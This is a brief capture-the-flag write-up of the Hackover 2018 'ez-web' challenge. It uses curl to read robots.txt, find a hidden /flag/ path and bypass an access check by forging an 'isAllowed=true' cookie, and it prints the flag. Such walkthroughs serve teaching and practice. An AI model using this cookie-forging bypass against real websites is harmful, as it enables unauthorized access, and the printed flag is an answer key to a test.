Tags: headers cookies
Rating:
(Original write-up by @rawsec)
This is a web app showing only an under construction page. So let's start with the standard approach to path discovery - first up, /robots.txt.
$ curl http://ez-web.ctf.hackover.de:8080/robots.txt
User-agent: *
Disallow: /flag/
A few links later...
$ curl -v http://ez-web.ctf.hackover.de:8080/flag/flag.txt
...
< HTTP/1.1 200
< Set-Cookie: isAllowed=false
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 219
< Date: Sun, 07 Oct 2018 18:24:32 GMT
<
...
<p>You do not have permission to enter this Area. A mail has been sent to our Admins.<br/>You shall be arrested shortly.</p>
...
Well, let's set the cookie to isAllowed=true then...
$ curl -s --cookie "isAllowed=true" http://ez-web.ctf.hackover.de:8080/flag/flag.txt | grep -o "hackover18{.*}"
hackover18{W3llD0n3,K1d.Th4tSh0tw4s1InAM1ll10n}
Cheapo!
